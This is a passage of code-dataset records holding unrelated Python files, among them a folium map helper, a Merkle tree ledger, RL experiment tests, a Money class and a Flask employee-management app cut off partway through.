\"darkblue\",\n \"darkgreen\",\n \"cadetblue\",\n \"darkpurple\",\n \"pink\",\n \"lightblue\",\n \"lightgreen\",\n]\n\n\ndef create_map(locations: list[LocationInDb]) -> folium.Map:\n if locations:\n loc = locations[0]\n m = folium.Map(\n zoom_start=8,\n location=[loc.latitude, loc.longitude],\n # tiles=\"http://127.0.0.1:8000/static/map.json\",\n # attr='© OpenStreetMap contributors',\n max_zoom=24,\n )\n else:\n m = folium.Map(\n max_zoom=24,\n )\n for loc in locations:\n folium.Marker(\n location=[loc.latitude, loc.longitude],\n tooltip=loc.name,\n popup=loc.name,\n icon=folium.Icon(icon=\"globe\", color=random.choice(COLORS)),\n ).add_to(m)\n\n return m\n\n\ndef get_map_html(locations: list[LocationInDb]) -> str:\n m = create_map(locations)\n html: str = m.get_root().render()\n return html\n\n\ndef get_map_bytes(locations: list[LocationInDb]) -> bytes:\n html: str = get_map_html(locations)\n html_bytes = html.encode(\"utf-8\")\n return html_bytes\n","repo_name":"crawlic-stud/map-bot","sub_path":"src/services/map_display.py","file_name":"map_display.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5472761241","text":"def solution(clothes):\n answer = 1\n cloth_dict = {}\n for c in clothes:\n cloth_type = c[1]\n if 
cloth_type not in cloth_dict:\n            cloth_dict[cloth_type] = 1\n        else:\n            cloth_dict[cloth_type] += 1\n\n    for k in cloth_dict.keys():\n        answer *= (cloth_dict[k] + 1)\n\n    answer -= 1\n    return answer\n\n\nprint(solution([[\"yellowhat\", \"headgear\"], [\"bluesunglasses\", \"eyewear\"], [\"green_turban\", \"headgear\"]])) # 5\nprint(solution([[\"crowmask\", \"face\"], [\"bluesunglasses\", \"face\"], [\"smoky_makeup\", \"face\"]])) # 3","repo_name":"UJHa/Codeit-Study","sub_path":"프로그래머스/00_코딩테스트_고득점_Kit/01_해시/3_위장/jinhwan.py","file_name":"jinhwan.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35126027349","text":"import hashlib\n\nclass MerkleTree:\n    def __init__(self, transactions):\n        self.transactions = transactions\n        self.past_transaction = [hashlib.sha256(transaction.encode()).hexdigest() for transaction in transactions]\n        self.current_transaction = []\n\n        while len(self.past_transaction) > 1:\n            if len(self.past_transaction) % 2 != 0:\n                self.past_transaction.append(self.past_transaction[-1])\n            for i in range(0, len(self.past_transaction), 2):\n                transaction = self.past_transaction[i] + self.past_transaction[i+1]\n                current = hashlib.sha256(transaction.encode()).hexdigest()\n                self.current_transaction.append(current)\n            self.past_transaction = self.current_transaction\n            self.current_transaction = []\n\n        self.root = self.past_transaction[0]\n\n\nclass Ledger:\n    def __init__(self):\n        self.transactions = []\n        self.tree = None\n\n    def add_transaction(self, transaction):\n        self.transactions.append(transaction)\n        self.tree = MerkleTree(self.transactions)\n\n    def verify_transaction(self, transaction):\n        return transaction in self.transactions\n\n    def verify_ledger(self):\n        # Rebuild the Merkle tree from the stored transactions and compare roots;\n        # a flat sha256 of the joined strings would never match the Merkle root.\n        return self.tree is not None and self.tree.root == MerkleTree(self.transactions).root\n\n\nif __name__ == '__main__':\n\n    # Create a new ledger\n    ledger = Ledger()\n\n    # Add some transactions\n    ledger.add_transaction(\"Alice sends 1 BTC to Bob\")\n    ledger.add_transaction(\"Bob sends 2 BTC to Charlie\")\n    ledger.add_transaction(\"Charlie sends 0.5 BTC to David\")\n\n    # Verify that the transactions are present in the ledger\n    print(ledger.verify_transaction(\"Alice sends 1 BTC to Bob\")) # True\n    print(ledger.verify_transaction(\"Bob sends 2 BTC to David\")) # False\n\n    # Verify the integrity of the ledger\n    print(ledger.verify_ledger()) # True\n","repo_name":"laiduy98/blockchain_project","sub_path":"merkel_test.py","file_name":"merkel_test.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27965589053","text":"responses = {}\npolling_active = True\nwhile polling_active:\n\tname = raw_input(\"What is your name? \")\n\tresponse = raw_input(\"Which VA stream did you take measurements? \")\n\tresponses[name] = response\n\trepeat = raw_input(\"Is there another person on your team to respond? 
(yes/no) \")\n\tif repeat == 'no':\n\t\tpolling_active = False\n\tprint (\"--- Stream Visitation Results ---\")\n\tfor name, response in responses.items():\n\t\tprint(name + \" took measurements at the \" + response + \" site.\")\n","repo_name":"APtech321/code_em","sub_path":"Alex Peskin/fill_a_dictionary.py","file_name":"fill_a_dictionary.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29438132759","text":"def suma_divisores(a):\n    divisores = [0]\n    for i in range (1,a):\n        if a % i == 0:\n            divisores.append(i)\n    if sum(divisores) == 1:\n        x = True\n\n    else:\n        x = False\n\n    return sum(divisores),x\nif __name__ == \"__main__\":\n    x = eval(input(\"Enter the number\"))\n    print(suma_divisores(x))\n\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema3_ej1/tema3_ej1_43cf0697a40d89ce2202353334858aeb.py","file_name":"tema3_ej1_43cf0697a40d89ce2202353334858aeb.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11118842589","text":"import pandas as pd\nimport os\nimport warnings\nwarnings.filterwarnings(action='ignore')\n\n\nall_data=pd.DataFrame(columns=['rate', 'review'])\n\nos.chdir('./infos')\nli=os.listdir()\nfor i in li:# merge the collected reviews into a single dataframe\n    data= pd.read_table(i)\n    all_data = pd.concat([all_data, data], ignore_index=True, axis=0)\n\n\nprint('initial data count :',len(all_data))#\nall_data.drop_duplicates(subset=['review'], inplace=True)# drop duplicated reviews\nprint('count after deduplication :',len(all_data))\n\nall_data = all_data.dropna(how = 'any') # drop rows that contain null values\nprint('any null values left?=',all_data.isnull().values.any()) # check whether null values remain\n\nprint('\\n===================\\n')\n\n# remove event/promotion related reviews (the Korean keyword filters below are data and are kept as-is)\nremove=['이벤트','핫티스트','선.+','십오야','홀세일','통장','작가님','썸딜','마크',\n       '나인NINE9','무료','알람','감상후','수정','리뷰뿅','연재','리디','포인트백',\n       '포백','이벤','이벵','1+1','나중에','후리뷰','.+님','리다무']\nfor i in remove:\n    all_data = all_data[all_data[\"review\"].str.contains(i) == False]\n\nprint(all_data.groupby('rate').size().reset_index(name = 'count'))# check the original data volume\nall_data.to_csv('origin_all_data.txt',mode='w',index=False)\n\nprint('\\n===================\\n')\n\nn_data=all_data[all_data['rate']==-1]# extract negative reviews\nn_data['rate']=n_data['rate'].apply(lambda x:x+1)\np_data=all_data[all_data['rate']==1].sample(n=len(n_data))# randomly sample positive reviews to match the number of negative reviews\n\n# concatenate positive/negative reviews, shuffle, and save to a new file\nresult=pd.concat([n_data,p_data], ignore_index=True, axis=0).sample(frac=1).reset_index(drop=True)\nprint(result.groupby('rate').size().reset_index(name = 'count'))\nresult.to_csv('result_all_data.txt',mode='w', index=False)\n\n\n","repo_name":"world970511/RIDIBOOKS_romance_webnovel_review_Sentiment_Analysis","sub_path":"crawler_ code/clean_info.py","file_name":"clean_info.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32783863177","text":"import tkinter as tk\r\n\r\nroot = tk.Tk()\r\n\r\ndef clear_entry(self): # function is passed event from bind\r\n    print(\"clearin\")\r\n    print(self.widget) # event.widget tells us which btn was clicked\r\n    print(btn._name) # this correlates with btn._name\r\n    \r\nbtn = tk.Button(root, text='Clear')\r\nbtn.grid()\r\nbtn.bind('<Button-1>', clear_entry) # no parentheses for function as it is\r\n                          # a reference not a 
call\r\nroot.mainloop()\r\n","repo_name":"ccnelson/Python","sub_path":"tkinter/button_bind.py","file_name":"button_bind.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23276276072","text":"import torch\nimport torch.nn as nn\n\nclass ContrastiveLoss(nn.Module):\n def __init__(self, alpha, beta, margin):\n super(ContrastiveLoss, self).__init__()\n self.alpha = alpha\n self.beta = beta\n self.margin = margin\n\n def forward(self, x1, x2, y):\n distance = torch.pairwise_distance(x1, x2, p=2)\n loss = self.alpha * (1-y) * distance**2 + \\\n self.beta * y * (torch.max(torch.zeros_like(distance), self.margin - distance)**2)\n return torch.mean(loss, dtype=torch.float)","repo_name":"serkancancaglayan/Signature-Verification-SiameseNet-SVM","sub_path":"ContrastiveLoss.py","file_name":"ContrastiveLoss.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"11668269782","text":"from ray import tune\n\nfrom toolbox.dece.dece import DECETrainer\nfrom toolbox.dece.utils import *\nfrom toolbox.env import FourWayGridWorld\nfrom toolbox.marl.test_extra_loss import _base\n\n\ndef test_dece(config={}, local_mode=False, t=2000, **kwargs):\n _base(\n trainer=DECETrainer,\n local_mode=local_mode,\n extra_config=config,\n env_name=\"Pendulum-v0\",\n t=t,\n **kwargs\n )\n\n\ndef test_dece_batch0(local_mode=False):\n test_dece(\n {\n DIVERSITY_ENCOURAGING: True,\n USE_BISECTOR: tune.grid_search([True, False]),\n USE_DIVERSITY_VALUE_NETWORK: tune.grid_search([True, False]),\n CLIP_DIVERSITY_GRADIENT: True,\n DELAY_UPDATE: tune.grid_search([True, False]),\n REPLAY_VALUES: tune.grid_search([True, False]),\n TWO_SIDE_CLIP_LOSS: tune.grid_search([True, False])\n }, local_mode\n )\n\n\ndef test_two_side_loss(local_mode=False):\n test_dece(\n {TWO_SIDE_CLIP_LOSS: tune.grid_search([True, False])}, local_mode\n )\n\n\ndef test_delay_update(local_mode=False):\n test_dece({DELAY_UPDATE: tune.grid_search([True, False])}, local_mode)\n\n\ndef test_three_tuning(local_mode=False):\n test_dece(\n {\n DELAY_UPDATE: tune.grid_search([True, False]),\n USE_DIVERSITY_VALUE_NETWORK: tune.grid_search([True, False]),\n REPLAY_VALUES: tune.grid_search([True, False])\n }, local_mode\n )\n\n\ndef test_vtrace(local_mode=False, hard=False):\n _base(\n trainer=DECETrainer,\n local_mode=local_mode,\n extra_config={\n REPLAY_VALUES: True,\n 'sample_batch_size': 50 if hard else 8,\n 'train_batch_size': 450 if hard else 96,\n 'num_sgd_iter': 10 if hard else 2,\n \"sgd_minibatch_size\": 150 if hard else 3 * 8,\n 'model': {\n 'fcnet_hiddens': [16, 16]\n },\n 'seed': 0\n # 'lr': 5e-3,\n },\n env_name=FourWayGridWorld,\n t=100000\n )\n\n\ndef test_vtrace_single_agent(local_mode=False):\n _base(\n trainer=DECETrainer,\n local_mode=local_mode,\n extra_config={\n REPLAY_VALUES: tune.grid_search([True, False]),\n 'sample_batch_size': 50,\n 'train_batch_size': 200,\n 'num_sgd_iter': 10,\n 'sgd_minibatch_size': 50\n },\n env_name=FourWayGridWorld,\n t=20000,\n num_agents=1\n )\n\n\ndef regression_test(local_mode=False):\n _base(\n trainer=DECETrainer,\n local_mode=local_mode,\n extra_config={\n REPLAY_VALUES: tune.grid_search([True, False]),\n # \"normalize_advantage\": tune.grid_search([True, False]),\n # 'use_vtrace': tune.grid_search([True]),\n 'sample_batch_size': 128,\n 'train_batch_size': 512,\n 'sgd_minibatch_size': 128,\n 'num_sgd_iter': 10,\n 
USE_BISECTOR: False,\n 'seed': tune.grid_search([432, 1920]),\n # 'lr': 5e-3,\n },\n # env_name=\"Pendulum-v0\",\n # env_name=\"CartPole-v0\",\n env_name=FourWayGridWorld,\n t={'time_total_s': 300},\n # t={'timesteps_total': 300000},\n num_agents=1\n )\n\n\ndef only_tnb(local_mode=False):\n test_dece(\n {\n DELAY_UPDATE: tune.grid_search([True, False]),\n ONLY_TNB: True,\n REPLAY_VALUES: False\n }, local_mode\n )\n\n\ndef single_agent_dece(lm=False):\n test_dece(\n {\n DELAY_UPDATE: tune.grid_search([True]),\n REPLAY_VALUES: tune.grid_search([False]),\n USE_DIVERSITY_VALUE_NETWORK: tune.grid_search([False]),\n NORMALIZE_ADVANTAGE: tune.grid_search([False]),\n 'sample_batch_size': 50,\n 'sgd_minibatch_size': 64,\n 'train_batch_size': 2048,\n \"num_cpus_per_worker\": 1,\n \"num_cpus_for_driver\": 1,\n \"num_envs_per_worker\": 5,\n 'num_workers': 1,\n },\n lm,\n num_agents=tune.grid_search([1]),\n t=10000\n )\n\n\ndef replay_values_or_not_test(lm=False):\n test_dece(\n {\n REPLAY_VALUES: tune.grid_search([True, False]),\n 'num_envs_per_worker': 3,\n 'sample_batch_size': 20,\n 'sgd_minibatch_size': 120,\n 'train_batch_size': 480\n },\n lm,\n num_agents=tune.grid_search([1, 3])\n )\n\n\ndef mock_experiment(lm=False):\n _base(\n trainer=DECETrainer,\n local_mode=lm,\n extra_config={\n DELAY_UPDATE: tune.grid_search([True, False]),\n REPLAY_VALUES: tune.grid_search([True, False]),\n 'sample_batch_size': 20,\n 'sgd_minibatch_size': 100,\n 'train_batch_size': 500,\n },\n env_name=FourWayGridWorld,\n t={'timesteps_total': 5000},\n num_agents=tune.grid_search([1, 5])\n )\n\n\ndef no_replay_values_batch_size_bug(lm=False):\n _base(\n trainer=DECETrainer,\n local_mode=lm,\n extra_config={\n REPLAY_VALUES: tune.grid_search([True, False]),\n CONSTRAIN_NOVELTY: tune.grid_search(['soft', 'hard', None]),\n 'num_envs_per_worker': 4,\n 'sample_batch_size': 20,\n 'sgd_minibatch_size': 100,\n 'train_batch_size': 1000,\n \"num_cpus_per_worker\": 1,\n \"num_cpus_for_driver\": 1,\n 'num_workers': 2,\n },\n env_name=FourWayGridWorld,\n t=1000000,\n num_agents=tune.grid_search([5])\n )\n\n\ndef test_constrain_novelty(lm=False):\n test_dece(\n {\n CONSTRAIN_NOVELTY: tune.grid_search(['soft', 'hard', None]),\n \"novelty_stat_length\": 2,\n }, lm\n )\n\n\ndef test_marginal_cases(lm=False):\n test_dece({ONLY_TNB: True}, local_mode=lm)\n # test_dece({USE_BISECTOR: False})\n # test_dece({USE_DIVERSITY_VALUE_NETWORK: False})\n # test_dece({PURE_OFF_POLICY: True}, local_mode=lm)\n\n\nif __name__ == '__main__':\n # test_dece(local_mode=False)\n # test_dece_batch0(local_mode=False)\n # test_two_side_loss(local_mode=True)\n # test_delay_update(local_mode=False)\n # test_three_tuning(local_mode=False)\n single_agent_dece()\n # only_tnb()\n # regression_test(local_mode=False)\n # test_vtrace(local_mode=True)\n # test_vtrace_single_agent(local_mode=False)\n # replay_values_or_not_test(False)\n # test_vtrace(local_mode=True, hard=True)\n # mock_experiment(False)\n # no_replay_values_batch_size_bug(True)\n # test_constrain_novelty(False)\n # test_marginal_cases(False)\n","repo_name":"pengzhenghao/rl-interpretation","sub_path":"toolbox/dece/test_dece.py","file_name":"test_dece.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71690798649","text":"import pytest\r\nfrom myStack import MyStack\r\n\r\ndef test_push():\r\n s = MyStack()\r\n assert 1 == s.push(1)\r\n assert 2 == s.push(2)\r\n assert 2 == s.size()\r\n\r\ndef 
test_pop():\r\n s = MyStack()\r\n s.push(1)\r\n s.push(2)\r\n assert 2 == s.pop()\r\n assert 1 == s.pop()\r\n\r\ndef test_size():\r\n s = MyStack()\r\n s.push(1)\r\n s.push(2)\r\n s.push(3)\r\n assert 3 == s.size()\r\n s.pop()\r\n assert 2 == s.size()\r\n s.push(4)\r\n assert 3 == s.size()\r\n\r\ndef test_empty():\r\n s = MyStack()\r\n assert 1 == s.isEmpty()\r\n s.push(1)\r\n assert 0 == s.isEmpty()\r\n s.pop()\r\n assert 1 == s.isEmpty()\r\n\r\ndef test_peek():\r\n s = MyStack()\r\n s.push(1)\r\n s.push(2)\r\n assert 2 == s.peek()\r\n s.push(3)\r\n assert 3 == s.peek()\r\n s.pop()\r\n assert 2 == s.peek()\r\n\r\ndef test_sort():\r\n s = MyStack()\r\n s.push(2)\r\n s.push(3)\r\n s.push(1)\r\n s.push(10)\r\n s.push(5)\r\n s.sort()\r\n assert 10 == s.pop()\r\n assert 5 == s.pop()\r\n assert 3 == s.pop()\r\n assert 2 == s.pop()\r\n assert 1 == s.pop()","repo_name":"rjafar/cracking-coding-interview","sub_path":"data_structures/Stack/test_myStack.py","file_name":"test_myStack.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70414815929","text":"import requests\n\nurl = \"http://127.0.0.1:8000/process-image\"\npayload = {\n \"image_src\": \"https://image-auto-enhance-brightness-ml.sgp1.digitaloceanspaces.com/SAMPLE%20(4).jpg\",\n \"output_name\": \"xyab123rc\"\n}\nheaders = {\n \"Content-Type\": \"application/json\"\n}\nresponse = requests.put(url, json=payload, headers=headers)\n\nprint(response.status_code)\nprint(response.json())","repo_name":"arnav-dev-git/fast-api-ml","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"10337481098","text":"from celery import shared_task\nfrom celery.utils.log import get_task_logger\n\nfrom bookmaker.rapid_api import (\n get_next_matches_and_save_to_db,\n get_odds_and_update_matches_on_db,\n get_results_and_update_matches_on_db,\n)\n\nlogger = get_task_logger(__name__)\n\n\n@shared_task\n# beat task test\ndef task_test():\n logger.info(\"Task test log\")\n return \"return test\"\n\n\n@shared_task\ndef next_matches():\n logger.info(\"Getting next matches\")\n try:\n get_next_matches_and_save_to_db()\n except Exception as e:\n logger.info(\"Next matches exception,\", e)\n\n\n@shared_task\ndef odds():\n logger.info(\"Getting odds\")\n try:\n get_odds_and_update_matches_on_db()\n except Exception as e:\n logger.info(\"Odds exception,\", e)\n\n\n@shared_task\ndef results():\n logger.info(\"Getting results\")\n try:\n get_results_and_update_matches_on_db()\n except Exception as e:\n logger.info(\"Results exception,\", e)\n","repo_name":"joshrobbinsuk/brokelads_django_react","sub_path":"backend/bookmaker/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72977423290","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@date: 2022/4/28 下午9:17\n@file: create_cccf.py\n@author: zj\n@description: \n\"\"\"\nfrom typing import List\nimport os\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom zcls2.config.key_word import KEY_SEP\n\n\ndef load_data(data_root):\n assert os.path.isdir(data_root), data_root\n\n class_path = os.path.join(data_root, 'classes.txt')\n classes = np.loadtxt(class_path, dtype=str, delimiter=' ')\n\n train_list = list()\n train_path = os.path.join(data_root, 'train.txt')\n with 
open(train_path, 'r') as f:\n for line in f:\n tmp_list = line.strip().split(KEY_SEP)\n train_list.append(tmp_list)\n\n test_list = list()\n test_path = os.path.join(data_root, 'test.txt')\n with open(test_path, 'r') as f:\n for line in f:\n tmp_list = line.strip().split(KEY_SEP)\n test_list.append(tmp_list)\n\n return classes, train_list, test_list\n\n\ndef process(data_root, dst_classes: List, dst_train_list: List, dst_test_list: List):\n classes, train_list, test_list = load_data(data_root)\n\n current_class_num = len(dst_classes)\n dst_classes.extend(classes)\n\n for item in tqdm(train_list):\n img_path, target = item\n dst_train_list.append([os.path.join(data_root, img_path), int(target) + current_class_num])\n\n for item in tqdm(test_list):\n img_path, target = item\n dst_test_list.append([os.path.join(data_root, img_path), int(target) + current_class_num])\n\n\ndef save_classes(classes, class_path):\n assert not os.path.exists(class_path), class_path\n np.savetxt(class_path, classes, fmt='%s', delimiter=' ', newline='\\n', header='', )\n\n\ndef save_img_paths(img_path_list, data_path):\n assert not os.path.exists(data_path), data_path\n\n length = len(img_path_list)\n with open(data_path, 'w') as f:\n for idx, (img_path, target) in enumerate(img_path_list):\n if idx < (length - 1):\n f.write(f\"{img_path}{KEY_SEP}{target}\\n\")\n else:\n f.write(f\"{img_path}{KEY_SEP}{target}\")\n\n\ndef main():\n cifar100_dir = 'cifar100'\n caltech101_dir = 'caltech-101'\n cub200_dir = 'CUB_200_2011'\n food101_dir = 'food-101'\n\n print('process ...')\n classes = list()\n train_list = list()\n test_list = list()\n process(cifar100_dir, classes, train_list, test_list)\n process(caltech101_dir, classes, train_list, test_list)\n process(cub200_dir, classes, train_list, test_list)\n process(food101_dir, classes, train_list, test_list)\n\n print('save ...')\n dst_classes_path = './classes.txt'\n save_classes(classes, dst_classes_path)\n dst_train_path = './train.txt'\n save_img_paths(train_list, dst_train_path)\n dst_test_path = './test.txt'\n save_img_paths(test_list, dst_test_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zjykzj/cccf","sub_path":"scripts/create_cccf.py","file_name":"create_cccf.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74227367287","text":"class Money:\n rate = 1\n\n def __init__(self, integer=0, fraction=0):\n self._integer = integer\n self._fraction = fraction\n\n @staticmethod\n def make_from_str(money_str):\n m = Money()\n money_list = money_str.split('.')\n if len(money_list) > 0:\n m._integer = int(money_list[0])\n if len(money_list) > 1:\n m._fraction = int(money_list[1])\n return m\n\n def to_float(self):\n return float('{}.{}'.format(self._integer, self._fraction))\n\n def __repr__(self):\n return '{},{}'.format(self._integer, self._fraction)\n\n def __add__(self, other):\n sum_num = self.to_float() + other.to_float()\n return Money.make_from_str(str(sum_num))\n\n def __sub__(self, other):\n sum_num = self.to_float() - other.to_float()\n return Money.make_from_str(str(sum_num))\n\n def __truediv__(self, other):\n if isinstance(other, Money):\n sum_num = self.to_float()/other.to_float()\n else:\n sum_num = self.to_float()/other\n this_num = self._integer * 100 + self._fraction\n return Money.make_from_str(str(sum_num))\n\n def __lt__(self, other):\n res = False\n if self._integer < other._integer:\n res = True\n elif self._integer == 
other._integer:\n            res = self._fraction < other._fraction\n        return res\n\n    def __gt__(self, other):\n        res = False\n        if self._integer > other._integer:\n            res = True\n        elif self._integer == other._integer:\n            res = self._fraction > other._fraction\n        return res\n\n    def __le__(self, other):\n        res = False\n        if self._integer < other._integer:\n            res = True\n        elif self._integer == other._integer:\n            res = self._fraction <= other._fraction\n        return res\n\n    def __ge__(self, other):\n        res = False\n        if self._integer > other._integer:\n            res = True\n        elif self._integer == other._integer:\n            res = self._fraction >= other._fraction\n        return res\n\n    def __eq__(self, other):\n        if self._integer == other._integer and \\\n                self._fraction == other._fraction:\n            res = True\n        else:\n            res = False\n        return res\n\n    def __ne__(self, other):\n        return not self.__eq__(other)\n\n    def to_dollars(self):\n        dol = self.to_float() / Money.rate\n        return str(Money.make_from_str(str(dol)))\n\n\nif __name__ == '__main__':\n    m1 = Money(10, 50)\n    m2 = Money(100, 125)\n    print('m1 = ', m1)\n    print('m2 = ', m2)\n    print('{} + {} = {}'.format(m1, m2, m1+m2))\n    print('{} - {} = {}'.format(m1, m2, m1-m2))\n    print('{} / {} = {}'.format(m1, m2, m1/m2))\n    print('{} < {} = {}'.format(m1, m2, m1<m2))\n    print('{} > {} = {}'.format(m1, m2, m1>m2))\n    print('{} <= {} = {}'.format(m1, m2, m1<=m2))\n    print('{} >= {} = {}'.format(m1, m2, m1>=m2))\n    Money.rate = 60\n    print('{} to dollars = {}'.format(m1, m1.to_dollars()))\n    print('{} to dollars = {}'.format(m2, m2.to_dollars()))\n","repo_name":"ZloiGaMeR/PythonCourseATIS","sub_path":"Useful/for_lec14/task_10.py","file_name":"task_10.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2923098607","text":"from django.urls import path\nfrom rest_framework import routers\nfrom .views import (UserViewSet , FriendList , Follow , UnFollow )\n\napp_name = 'accountapi'\n\nrouter = routers.SimpleRouter()\n\nrouter.register('user',UserViewSet,basename='user')\n\nurlpatterns = router.urls\n\nurlpatterns = [\n    path('friend/',FriendList.as_view(),name='friend_list'),\n    path('follow/',Follow.as_view(),name='follow'),\n    path('unfollow/',UnFollow.as_view(),name='un_follow'),\n\n]","repo_name":"hanieh-mav/SocialNetwork-with-drf","sub_path":"accountapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"73070280250","text":"from flask import Flask, render_template, request\r\nfrom pymysql import connections\r\nimport boto3\r\nfrom config import *\r\n\r\napp = Flask(__name__)\r\n\r\nbucket = custombucket\r\nregion = customregion\r\n\r\ndb_conn = connections.Connection(\r\n    host=customhost,\r\n    port=3306,\r\n    user=customuser,\r\n    password=custompass,\r\n    db=customdb\r\n)\r\n\r\n#routes\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n    return render_template('index.html')\r\n\r\n@app.route(\"/contact\")\r\ndef contact():\r\n    return render_template('contact.html')\r\n\r\n@app.route(\"/portfolioSammi\")\r\ndef portfolioSammi():\r\n    return render_template('portfolio-sammi.html')\r\n\r\n@app.route(\"/portfolioWl\")\r\ndef portfolioWl():\r\n    return render_template('portfolio-wl.html')\r\n\r\n@app.route(\"/portfolioYz\")\r\ndef portfolioYz():\r\n    return render_template('portfolio-yz.html')\r\n\r\n# four different features\r\n\r\n@app.route(\"/empMgr\", methods=['GET'])\r\ndef empMgr():\r\n    db_conn.ping(reconnect=True)\r\n    cursor = 
db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM employee')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('emp-mgr.html', rows=rows)\r\n\r\n@app.route(\"/payroll\", methods=['GET'])\r\ndef payroll():\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM payroll')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('payroll.html', rows=rows)\r\n\r\n@app.route(\"/attendance\", methods=['GET'])\r\ndef attendance():\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM attendance')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('attendance.html', rows=rows)\r\n\r\n@app.route(\"/leave\", methods=['GET'])\r\ndef leave():\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM leave_application')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('leave.html', rows=rows)\r\n\r\n#database routes\r\n\r\n#EMP Manager\r\n@app.route(\"/addEmp\", methods=['GET', 'POST'])\r\ndef addEmp():\r\n return render_template('addEmp.html')\r\n\r\n@app.route(\"/addEmpProcess\", methods=['GET', 'POST'])\r\ndef addEmpProcess():\r\n emp_id = request.form['employee_id']\r\n emp_name = request.form['name']\r\n gender = request.form['gender']\r\n dob = request.form['dob']\r\n address = request.form['address']\r\n email = request.form['email']\r\n phone_num = request.form['phone']\r\n job_title = request.form['job_title']\r\n pay_scale = request.form['pay_scale']\r\n hire_date = request.form['hire_date']\r\n\r\n insert_sql = \"INSERT INTO employee VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute(insert_sql, (emp_id, emp_name, gender, dob, address, email, phone_num, job_title, pay_scale, hire_date))\r\n db_conn.commit()\r\n cursor.close()\r\n\r\n cursor = db_conn.cursor()\r\n cursor.execute('SELECT * FROM employee')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('emp-mgr.html', rows=rows)\r\n\r\n@app.route(\"/searchEmp\", methods=['GET', 'POST'])\r\ndef searchEmp():\r\n return render_template('searchEmp.html')\r\n\r\n@app.route(\"/searchEmpProcess\", methods=['GET', 'POST'])\r\ndef searchEmpProcess():\r\n emp_id = request.form['employee_id']\r\n\r\n search_sql = \"SELECT * FROM employee WHERE Employee_ID=%s\"\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute(search_sql, (emp_id))\r\n rows = cursor.fetchall()\r\n cursor.close() \r\n\r\n return render_template('emp-mgr.html', rows=rows)\r\n\r\n@app.route(\"/removeEmp\", methods=['GET', 'POST'])\r\ndef removeEmp():\r\n return render_template('removeEmp.html')\r\n\r\n@app.route(\"/removeEmpProcess\", methods=['GET', 'POST'])\r\ndef removeEmpProcess():\r\n emp_id = request.form['employee_id']\r\n\r\n remove_sql = \"DELETE FROM employee WHERE Employee_ID = %s\"\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute(remove_sql, emp_id)\r\n db_conn.commit()\r\n cursor.close()\r\n\r\n cursor = db_conn.cursor()\r\n cursor.execute('SELECT * FROM employee')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('emp-mgr.html', rows=rows)\r\n \r\n\r\n#Payroll Manager\r\n@app.route(\"/payslip\")\r\ndef payslip():\r\n\r\n return render_template('payEmp.html')\r\n\r\n@app.route(\"/payslipProcess\", methods=['GET', 
